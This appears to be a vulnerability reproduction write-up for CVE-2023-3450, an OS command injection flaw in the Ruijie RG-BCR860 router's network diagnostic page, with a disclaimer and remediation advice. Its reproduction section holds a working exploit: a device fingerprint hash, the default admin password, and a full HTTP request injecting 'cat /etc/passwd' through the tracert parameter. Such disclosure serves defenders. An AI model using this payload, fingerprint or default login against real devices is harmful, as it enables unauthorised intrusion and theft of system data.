Article directory
foreword
The Ruijie RG-BCR860 2.5.13version has an operating system command injection vulnerability, through which attackers can obtain sensitive server information and cause the server to be compromised.
statement
Do not use the relevant technologies in this article to engage in illegal testing. Any direct or indirect consequences and losses caused by the dissemination and use of the information or tools provided in this article shall be borne by the user himself. All adverse consequences and The author of the article is irrelevant. This article is for educational purposes only.
1. Introduction
Beijing Xingwang Ruijie Network Technology Co., Ltd. is an industry-leading provider of ICT infrastructure and industry solutions. Its main business is the R&D, design and sales of network equipment, network security products and cloud desktop solutions. The Ruijie Networks RG-BCR860 is a commercial cloud router from the company.
2. Vulnerability overview
The Ruijie RG-BCR860 2.5.13version has an operating system command injection vulnerability, which is caused by a problem with the component Network Diagnostic Page, which will lead to operating system command injection.
Vulnerability number:CVE-2023-3450
Three, the impact version
Ruijie RG-BCR860 2.5.13 版本
4. Environment construction
Non-open source products cannot be built.
Fingerprint feature: icon_hash="-399311436"
5. Vulnerability recurrence
This vulnerability belongs to the background vulnerability. You need to enter the default password admin to enter the background.
The version is: BCOS V2.5.10 . Run the entered command and find that the executed command is echoed in the detection box. The data packets executed by the Burp capture command are as follows:
127.0.0.1;cat /etc/passwd
GET /cgi-bin/luci/;stok=7159************************c3/admin/diagnosis?diag=tracert&tracert_address=127.0.0.1%3Bcat+%2Fetc%2Fpasswd&seq=0 HTTP/1.1
Host: 127.0.0.1:6060
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
X-Requested-With: XMLHttpRequest
Referer: http://127.0.0.1:6060/cgi-bin/luci/;stok=7159*******************************c3/admin/diagnosis
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ak;q=0.8
Cookie: sysauth=06a17629adb3bed0a6e95d9eeec0abe6
Connection: close
6. Repair method
At present, the manufacturer has released an upgrade patch to fix the vulnerability. Due to the lax filtering of normal functions, this vulnerability has command injection and requires a high-privilege account login operation. It is recommended to change the login password to a strong password and control access to the original address through the whitelist.